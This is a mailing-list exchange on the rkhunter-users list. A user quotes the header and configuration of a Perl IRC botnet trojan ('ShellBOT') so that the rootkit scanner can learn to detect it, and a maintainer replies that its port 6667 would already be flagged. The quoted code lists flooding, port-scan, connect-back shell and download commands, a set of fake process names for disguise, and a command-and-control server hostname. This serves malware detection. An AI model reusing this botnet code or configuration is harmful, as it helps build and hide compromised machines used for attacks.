On Tue, 2011-02-22 at 15:28 +0300, sae wrote:
> This Trojan not detected by Rkhunter.
> pleases ADD.
>
> ===========
> #!/usr/bin/perl
> #
> # ShellBOT by: devil__
> # Greetz: Puna, Kelserific
> #
> # Comandos:
> # @oldpack <ip> <bytes> <tempo>;
> # @udp <ip> <porta> <tempo>;
> # @fullportscan <ip> <porta inicial> <porta final>;
> # @conback <ip> <porta>
> # @download <url> <arquivo a ser salvo>;
> # !estatisticas <on/off>;
> # !sair para finalizar o bot;
> # !novonick para trocar o nick do bot por um novo aleatorio;
> # !entra <canal> <tempo>
> # !sai <canal> <tempo>;
> # !pacotes <on/off>
> # @info
> # @xpl <kernel>
> # @sendmail <assunto> <remetente> <destinatario> <conteudo>
>
> ########## CONFIGURACAO ############
>
> my @ps = ("/usr/local/apache/bin/httpd
> -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x
> -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
> my $processo = $ps[rand scalar @ps];
>
> $servidor='marvimex.hacked.jp' unless $servidor;
> my $porta='6667';
>
Hello,
If this is using port 6667, then the 'ports' check will have picked it
up.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001
------------------------------------------------------------------------------
Index, Search & Analyze Logs and other IT data in Real-Time with Splunk
Collect, index and harness all the fast moving IT data generated by your
applications, servers and devices whether physical, virtual or in the cloud.
Deliver compliance at lower cost and gain new business insights.
Free Software Download: http://p.sf.net/sfu/splunk-dev2dev
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
